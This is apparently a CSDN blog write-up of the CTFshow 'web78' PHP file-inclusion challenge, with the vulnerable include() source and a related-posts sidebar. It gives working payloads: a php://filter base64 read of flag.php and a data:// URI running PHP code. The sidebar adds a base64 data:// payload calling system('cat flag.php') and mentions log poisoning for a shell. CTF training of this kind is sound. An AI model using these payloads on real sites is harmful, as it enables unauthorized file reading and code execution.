CTFshow 文件包含 web78

最新推荐文章于 2024-08-05 16:45:50 发布
最新推荐文章于 2024-08-05 16:45:50 发布
阅读量127 收藏
点赞数
分类专栏: CTFshow 文章标签: php 开发语言 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kracxi/article/details/121768352
版权
本文探讨了一段PHP代码,该代码存在安全漏洞,允许通过GET参数`file`执行任意文件。攻击者可以利用此漏洞通过base64编码或者data URI scheme来读取敏感文件,如`flag.php`。博客总结为这是一个简单的安全挑战(水题)。
摘要由CSDN通过智能技术生成

目录

源码

<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-09-16 10:52:43
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-16 10:54:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/


if(isset($_GET['file'])){
    $file = $_GET['file'];
    include($file);
}else{
    highlight_file(__FILE__);
}

思路

没什么过滤

题解

file=php://filter/read=convert.base64-encode/resource=flag.php
或者
data://text/plain,<?php print_r(file_get_contents("flag.php"))?>

总结

水题

Kradress
关注
专栏目录
CTFshow 文件包含 web80
Kradress的博客
12-08 920
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 11:26:29 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){
CTFshow 文件包含 web116
Kradress的博客
12-12 831
目录源码思路题解总结 源码 下载视频用winhex分离出png 思路 可以正常读文件 题解 直接跑字典 总结 水题
CTFshow_web入门_文件包含_web78-
weixin_43896504的博客
07-22 430
文件包含
CTFSHOW WEB入门 文件包含 web78-
sinat_41572027的博客
07-11 834
CTFSHOW WEB入门 文件包含 web78.79.80.81.87.88.116.117
CTFshow 文件包含Web78-Web117
dasdasdasvsdV的博客
08-04 329
注意用法,allow_url_fopen和allow_url_include都满足的时候才可以用常用场景:文件包含、文本包含。
ctfshow-web78(文件包含)
m0_62094846的博客
01-11 1270
if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } ?file=php://filter/read=convert.base64-encode/resource=flag.php
CTFshow 文件包含 web78-88 116 117
最新发布
potatojiang的博客
08-05 1052
这里我们需要注意的是我们的php://fiter/write=convert.base64-encode/resource=2.php需要进行两次url编码,而对我们的<?>需要进行一次base64编码,由于base64编码范围的原因<?>会被过滤为phpdie为6个,需要加上任意2个在base64范围内的字符即可,所以。PHP_SESSION_UPLOAD_PROGRESS获取实时文件上传进度,利用这个函数将内容写在文件中去。先确认文件存在,检测有没<,在把文件包含。发现一个png文件,保存下来。
ctfshow 文件包含Web78-79
m0_62584974的博客
04-15 1883
Ctfshow文件包含漏洞Web78 2022/4/15 漏洞简介: 文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期的文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。文件包含漏洞可能会造成服务器的网页被篡改、网站被挂马、服务器被远程控制、被安装后门等危害。 Web78 考察php伪协议 php://伪协议:php://伪协议是PHP提供的一些输人输出流访问功能,允许访问PHP的输入输出流,标准输人输出和错误描述符,.
CTFshow 文件包含 web87
Kradress的博客
12-12 1931
目录源码思路题解题解一题解二总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 21:57:55 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])
CTFshow 文件包含 web79
Kradress的博客
12-07 698
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-09-16 11:10:14 # @Last Modified by: h1xa # @Last Modified time: 2020-09-16 11:12:38 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ if(isset($_GET['file'])){
CTFshow 文件包含 web117
Kradress的博客
12-12 807
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: yu22x # @Date: 2020-09-16 11:25:09 # @Last Modified by: h1xa # @Last Modified time: 2020-10-01 18:16:59 */ highlight_file(__FILE__); error_reporting(0); function filter($x){ if(preg_ma
ctfshow_web入门_文件包含_web78~web117
qq_62989306的博客
09-13 855
文件包含php://filter伪协议、data协议、包含日志文件、session.upload_progress利用、条件竞争、死亡绕过……
【CTFshow】文件包含web78-web81
weixin_51614272的博客
02-25 4748
文件包含web78-web81web78web79php://input伪协议data协议web80php://input伪协议日志包含绕过web81web82(没完全理解) web78 if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 看到源码中的include函数,这个表示从外部引入php文件并执行,如果执行不成功,就返回文件的
ctfshow学习记录-web入门(文件包含78-87)
龟速更新的九某人
07-04 1808
ctfshow学习记录-web入门(文件包含web78-87)
[ctfshow]web入门文件包含78-88
L1ni01
12-04 2734
web 78 payload:?file=php://filter/read=convert.base64-encode/resource=flag.php web 79 payload: ?file=data://text/plain;base64,PD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTs= web 80-81 试了试文件日志包含漏洞 先抓包,发现是nginx,一般的日志路径为 /var/log/nginx/access.log 访问发现成功 进行getshel
ctfshow web入门 文件包含:web78-web81 web88 web116 web117
rawrecruit的博客
04-14 7370
个人ctfshow刷题记录
CTFshow web入门web78-文件包含1
weixin_74336671的博客
11-28 137
的攻击数据读取文件,拿到各种文件的。通过分析,此处未进行任何的过滤。利用Filter机制,构造。将flag提交结束!
ctfshow-web入门-文件包含web78web79、web80、web81)
Welcome To Myon'Blog !
07-04 1677
中间件的日志文件会保存网站的访问记录,比如HTTP请求行,User-Agent,Referer等客户端信息,如果在HTTP请求中插入恶意代码,那么恶意代码就会保存到日志文件中,访问日志文件的时候,日志文件中的恶意代码就会执行,从而造成任意代码执行甚至获取shell。此外我们也可以使用 data:// 协议进行代码执行,其实和 php://input 是一样的,让用户可以控制输入流,当它与文件包含函数结合时,用户输入的 data:// 流就会被当作 php 文件执行。会将我们输入的 php 替换为问号?
ctfshow web入门文件包含
05-24
2. Robots.txt文件:该文件包含网站的爬虫指令,告诉爬虫哪些页面可以被访问,哪些不可以。 3. .htaccess文件:该文件包含了一些服务器配置信息,比如重定向和安全设置等。 4. 网站地图:该文件列出了网站的所有页面...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值